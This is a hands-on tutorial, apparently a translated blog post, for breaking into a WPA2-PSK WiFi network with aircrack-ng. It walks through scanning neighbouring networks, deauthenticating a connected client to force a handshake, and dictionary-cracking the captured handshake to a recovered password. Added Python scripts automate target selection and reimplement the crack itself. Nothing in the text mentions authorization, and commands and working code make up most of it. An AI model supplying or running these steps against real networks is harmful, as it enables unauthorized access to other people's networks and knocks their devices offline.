Brute-forcing a WiFi password (WPA2-PSK with the aircrack-ng suite)

1. Put the wireless card into monitor mode: airmon-ng start wlan0

Kill the processes that can interfere with the experiment (NetworkManager, wpa_supplicant and the like): airmon-ng check kill

Note: airmon-ng check kill is normally run before airmon-ng start. Newer versions of airmon-ng rename the monitor interface to wlan0mon; if that happens on your system, use wlan0mon in place of wlan0 in every command below. iwconfig should show the interface as Mode:Monitor before you continue.

2. Run airodump-ng wlan0 to scan the nearby networks

[Screenshot: airodump-ng scan, 2018-07-24 17:57, Elapsed: 48 s. Columns: BSSID  PWR  Beacons  #Data, #/s  CH  MB  ENC  CIPHER  AUTH  ESSID. Several WPA2 / CCMP / PSK networks are listed (PWR around -51 to -56, MB 270 and 130), including the ESSIDs CNCC-4wd5, dLink, cycc-yeFU and the 2.4G network targeted below; a second table lists BSSID  STATION  PWR  Rate  Lost  Frames  Probe.]

BSSID MAC address of the access point

PWR signal strength in dBm (closer to 0 is stronger)

Beacons number of beacon (announcement) frames received from the AP

#Data number of captured data packets

#/s number of data packets per second, averaged over the last 10 seconds

CH channel number

MB maximum data rate supported by the AP

ENC encryption type (OPN, WEP, WPA, WPA2)

CIPHER cipher in use (CCMP, TKIP, WEP)

AUTH authentication protocol (PSK = pre-shared key, MGT = 802.1X/RADIUS)

ESSID WiFi network name
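To make the columns concrete, here is an added example (not code from the original post) that parses the CSV file airodump-ng writes next to the capture when you pass -w, and picks the target the way step 3 below does by hand: the strongest WPA/WPA2-PSK network that has at least one associated client, since the deauth trick later needs a client to kick. The CSV layout (an access-point table, a blank line, a station table) is the one airodump-ng writes; the sample rows are constructed, and only the post's BSSID and client MAC are taken from the page.

```python
"""Pick a target from airodump-ng's CSV output (added example, not the post's code).

airodump-ng -w <prefix> writes <prefix>-NN.csv beside the .cap file: an
access-point table, a blank line, then a station table. SAMPLE_CSV below is
constructed to resemble the scan in the post; MACs and ESSIDs other than the
post's BSSID F4:6A:92:2E:E8:B4 and client 78:02:F8:F1:8E:CD are illustrative.
"""
import csv
import io

SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
F4:6A:92:2E:E8:B4, 2018-07-24 17:56:30, 2018-07-24 17:57:18, 1, 270, WPA2, CCMP, PSK, -51, 84, 11, 0.  0.  0.  0, 4, 2.4G, 
AA:BB:CC:DD:EE:01, 2018-07-24 17:56:31, 2018-07-24 17:57:18, 6, 130, WPA2, CCMP, PSK, -56, 40, 0, 0.  0.  0.  0, 5, dLink, 
AA:BB:CC:DD:EE:02, 2018-07-24 17:56:31, 2018-07-24 17:57:18, 11, 54, OPN, , , -52, 30, 0, 0.  0.  0.  0, 8, FreeWiFi, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
78:02:F8:F1:8E:CD, 2018-07-24 17:56:35, 2018-07-24 17:57:18, -16, 15, F4:6A:92:2E:E8:B4, 
11:22:33:44:55:66, 2018-07-24 17:56:40, 2018-07-24 17:57:10, -40, 3, (not associated), 2.4G
"""


def _rows(section):
    """Parse one CSV section and drop its header row."""
    reader = csv.reader(io.StringIO(section), skipinitialspace=True)
    return [r for r in reader if r][1:]


def parse_airodump_csv(text):
    """Return {bssid: {...}} with each AP's associated client MACs attached."""
    text = text.replace("\r\n", "\n").strip("\n")
    ap_section, _, sta_section = text.partition("\n\n")
    aps = {}
    for r in _rows(ap_section):
        if len(r) < 14:
            continue
        aps[r[0]] = {"channel": int(r[3]), "privacy": r[5], "cipher": r[6],
                     "auth": r[7], "power": int(r[8]), "essid": r[13], "clients": []}
    for r in _rows(sta_section):
        if len(r) >= 6 and r[5] in aps:        # "(not associated)" stations are skipped
            aps[r[5]]["clients"].append(r[0])
    return aps


def choose_target(aps):
    """Strongest WPA/WPA2-PSK network with at least one associated client
    (the deauth step needs a client to disconnect). PWR closer to 0 is stronger."""
    candidates = [(b, a) for b, a in aps.items()
                  if a["privacy"].startswith("WPA") and a["auth"] == "PSK" and a["clients"]]
    if not candidates:
        return None
    bssid, ap = max(candidates, key=lambda ba: ba[1]["power"])
    return {"bssid": bssid, "channel": ap["channel"],
            "essid": ap["essid"], "client": ap["clients"][0]}


def capture_commands(target, iface="wlan0", prefix="pj/01"):
    """The capture and deauth commands from step 3, filled in from the chosen target."""
    return [
        f"airodump-ng {iface} --bssid {target['bssid']} -c {target['channel']} -w {prefix}",
        f"aireplay-ng -0 10 -a {target['bssid']} -c {target['client']} {iface}",
    ]


if __name__ == "__main__":
    for cmd in capture_commands(choose_target(parse_airodump_csv(SAMPLE_CSV))):
        print(cmd)
```

The open network (ENC = OPN) is ignored because there is no key to crack, and the dLink network is skipped because no station is associated with it; without a client you cannot force a handshake by deauthentication, you can only wait for one.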

3. Pick the network to crack (here the 2.4G network) and run:

airodump-ng wlan0 --bssid F4:6A:92:2E:E8:B4 -c 1 -w pj/01

Note: -c locks the card to the AP's channel; -w sets the output location and file-name prefix (here directory pj, prefix 01; airodump-ng appends -01, -02, ... on each run). Leave this running until the handshake shows up.

 

[Screenshot: airodump-ng locked to CH 1, Elapsed: 24 s, 2018-07-24 20:18, with "WPA handshake: F4:6A:92:2E:E8:B4" in the header line; the AP row shows WPA2 CCMP PSK, and the STATION table lists the connected clients (PWR -16 / -17).]

 

When "WPA handshake: F4:6A:92:2E:E8:B4" appears in the airodump-ng header line (top right), the 4-way handshake has been captured and you can move on to cracking.

If no handshake shows up, force one: deauthenticate a client that is already connected so that it drops and re-authenticates, and capture the handshake as it reconnects. Keep the airodump-ng capture from step 3 running in another terminal while you send the deauth frames; the client MAC comes from its STATION table.

aireplay-ng -0 10 -a F4:6A:92:2E:E8:B4 -c 78:02:F8:F1:8E:CD wlan0

[Screenshot: aireplay-ng output: "Waiting for beacon frame (BSSID: F4:6A:92:2E:E8:B4) on channel 1", followed by ten lines of "Sending 64 directed DeAuth (code 7). STMAC: [78:02:F8:F1:8E:CD] [N|M ACKs]".]

Note: -0 selects attack mode 0 (deauthentication) and 10 is the number of deauth bursts to send (0 means send without limit). -a is the AP's MAC address, -c the client's MAC address, and wlan0 the wireless interface. The ACK counts in brackets tell you whether the AP and the client actually received the frames; if both stay at 0, you are probably on the wrong channel or out of range.

 

For reference, the aireplay-ng attack modes:

Attack 0: Deauthentication

Attack 1: Fake authentication

Attack 2: Interactive packet replay

Attack 3: ARP request replay attack

Attack 4: KoreK chopchop attack

Attack 5: Fragmentation attack

Attack 6: Cafe-latte attack

Attack 7: Client-oriented fragmentation attack

Attack 8: WPA Migration Mode

Attack 9: Injection test

Modes 1 through 7 are WEP-era attacks; for the WPA2 capture here only mode 0 matters (and mode 9, to check that the card can inject at all).

4. Run ls 01* to see the captured files; the .cap file is the one to crack.

root@kali:~/pj# ls 01*
01-01.cap  01-01.csv  01-01.kismet.csv  01-01.kismet.netxml

 

Brute-force it with a dictionary (aircrack-ng tries every word in the list against the captured handshake):

aircrack-ng -w /usr/share/wordlists/rockyou.txt 01-02.cap

Note: the -NN suffix increments every time airodump-ng is started with the same prefix, so use whichever .cap file the ls above shows. On Kali, rockyou.txt ships compressed; run gunzip /usr/share/wordlists/rockyou.txt.gz first. If the capture contains more than one network, add -b F4:6A:92:2E:E8:B4 to select the target.

[Screenshot: Aircrack-ng 1.2 output: "... keys tested (928.68 k/s)", "KEY FOUND! [ 15331301 ]", followed by the Master Key, Transient Key and EAPOL HMAC hex dumps.]

Cracking succeeded: the password is 15331301. Keep in mind that aircrack-ng can only recover a passphrase that is in the wordlist; the k/s figure is the number of candidates tried per second, and a passphrase absent from the list is simply never found, however long the run.
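For readers who want to see what aircrack-ng actually does with the captured handshake, the following added example (not the post's code and not aircrack-ng's) reproduces the WPA2-PSK computation in plain Python: derive the PMK from the passphrase and SSID with PBKDF2-HMAC-SHA1, expand it to the PTK with the two MACs and the two nonces, and check the first 16 bytes (the KCK) against the MIC carried in EAPOL message 2. It first plays the client to build a handshake with the post's password 15331301, then recovers that password from a small constructed wordlist. The SSID "2.4G", the nonces and the wordlist are assumptions; the two MACs come from the post.

```python
"""What aircrack-ng computes from the 4-way handshake (added example, not the post's code).

WPA2-PSK key derivation (IEEE 802.11i):
  PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)
  PTK = PRF-512(PMK, "Pairwise key expansion",
                min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))
  KCK = PTK[0:16]
  MIC = HMAC-SHA1(KCK, EAPOL-Key frame with the MIC field zeroed)[0:16]
The handshake below is constructed with a known passphrase; everything an
attacker needs (SSID, MACs, nonces, message 2 with its MIC) is sent in clear.
"""
import hashlib
import hmac

# Offset of the 16-byte Key MIC inside an EAPOL-Key frame: 4-byte 802.1X header
# + descriptor type(1) + key info(2) + key length(2) + replay counter(8)
# + nonce(32) + IV(16) + RSC(8) + ID(8) = 81.
MIC_OFFSET = 81

SSID = "2.4G"                                  # assumed SSID of the post's target
AP_MAC = bytes.fromhex("F46A922EE8B4")         # BSSID from the post
STA_MAC = bytes.fromhex("7802F8F18ECD")        # client MAC from the post
ANONCE = bytes(range(32))                      # constructed AP nonce (message 1)
SNONCE = bytes(range(32, 64))                  # constructed station nonce (message 2)
# RSN element advertising WPA2 / CCMP / PSK, as carried in message 2.
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, 32). This is the expensive
    step; aircrack-ng's k/s figure counts how many of these it does per second."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces))."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):                         # 4 x 20 bytes = 80, truncated to 64
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck, eapol_frame):
    """Key MIC for key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 truncated to
    16 bytes. (WPA/TKIP, version 1, uses HMAC-MD5 instead.)"""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def build_msg2(snonce, rsn_ie):
    """EAPOL-Key message 2 (station -> AP) with the MIC field zeroed."""
    body = (bytes([2])                         # descriptor type: RSN
            + b"\x01\x0a"                      # key info: version 2, pairwise, MIC present
            + b"\x00\x00"                      # key length
            + (1).to_bytes(8, "big")           # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8)   # nonce, IV, RSC, ID
            + bytes(16)                        # MIC, zero while it is computed
            + len(rsn_ie).to_bytes(2, "big") + rsn_ie)
    return bytes([1, 3]) + len(body).to_bytes(2, "big") + body   # 802.1X v1, EAPOL-Key


def build_handshake(passphrase):
    """Play the station: derive the PTK and emit message 2 carrying a valid MIC."""
    ptk = prf512(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    frame = build_msg2(SNONCE, RSN_IE)
    mic = eapol_mic(ptk[:16], frame)           # KCK = first 16 bytes of the PTK
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]


def crack(ssid, ap_mac, sta_mac, anonce, snonce, captured_msg2, wordlist):
    """Dictionary attack: every input except the passphrase is public."""
    captured_mic = captured_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = captured_msg2[:MIC_OFFSET] + bytes(16) + captured_msg2[MIC_OFFSET + 16:]
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:      # WPA passphrases are 8..63 characters
            continue
        kck = prf512(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed), captured_mic):
            return candidate
    return None


def demo():
    """Build a capture with the post's password and recover it from a tiny wordlist."""
    captured = build_handshake("15331301")
    wordlist = ["123456", "password", "iloveyou", "15331301", "wifi1234"]  # constructed stand-in for rockyou.txt
    return crack(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, captured, wordlist)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

Two things this makes visible. First, the 4096-iteration PBKDF2 is the whole cost of the attack, and it is bound to the SSID, which is why aircrack-ng needs the ESSID from the beacon and why precomputed tables only work per network name. Second, the MIC check needs both nonces, so a usable capture must contain message 1 or 3 (for the ANonce) in addition to message 2 or 4; the "WPA handshake" indicator in airodump-ng is exactly that condition, and a deauth that makes the client redo the exchange is the quickest way to satisfy it.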

Related links:

https://blog.csdn.net/tonyzhejiang/article/details/72152512

https://blog.csdn.net/xinyuan510214/article/details/50395076

 
